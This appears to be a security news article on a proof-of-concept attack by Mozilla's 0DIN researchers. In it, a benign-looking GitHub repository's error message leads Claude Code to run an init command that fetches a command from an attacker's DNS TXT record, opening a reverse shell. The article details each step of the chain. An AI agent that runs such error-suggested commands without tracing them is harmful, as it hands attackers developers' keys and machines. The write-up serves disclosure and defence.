An agentic coding tool tasked with cloning and setting up a seemingly benign GitHub repository could execute a malicious payload that remains invisible to security scanners, AI agents, and human reviewers.

Researchers at Mozilla's Zero Day Investigative Network (0DIN) AI security platform say that the compromise happens with "no exploit code, no warning, no suspicious command anyone had to approve."

They demonstrated how an attacker could plant an interactive shell on a developer's device by using Claude Code to run a cloned project without malicious code in the repository.

The new attack method relies on three components, which separately represent no threat and raise no suspicion:

1. A clean-looking GitHub repository with standard setup instructions, such as installing dependencies and initializing the project (e.g., pip3 install -r requirements.txt, python3 -m axiom init)
2. the Python package is intentionally designed to refuse execution until it has been initialized; it generates an error instructing the user to execute python3 -m axiom init. Claude Code treats this as a normal setup issue and automatically runs the suggested command while attempting to recover from the error
3. Executing python3 -m axiom init calls a shell script that retrieves the configuration value stored in a DNS TXT record controlled by the attacker, and is executed as a command

0DIN researchers explain that this approach requires no malicious component in the cloned repository, and the agent automates the entire attack chain, including a step that mimics a common user error.

If successful, the attacker would obtain a shell running with the developer’s privileges, giving them access to environment variables, API keys, local configuration files, and the opportunity to establish persistence.

“Claude Code never decided to open a shell. It decided to fix an error. The reverse shell is three indirection steps away from anything Claude Code actually evaluated: an error message it trusted, a script that fetched a value, and a DNS record it never saw,” 0DIN researchers say.

“The attacker now has an interactive shell running as the developer's own user.”

While the attack method is currently just a concept, 0DIN warns that threat actors could easily distribute such GitHub repositories through fake job postings, tutorials, blog posts, or direct messages.

To prevent such exploitation, 0DIN suggests that AI agents should disclose the full execution chain of setup commands, including scripts and code fetched dynamically at runtime.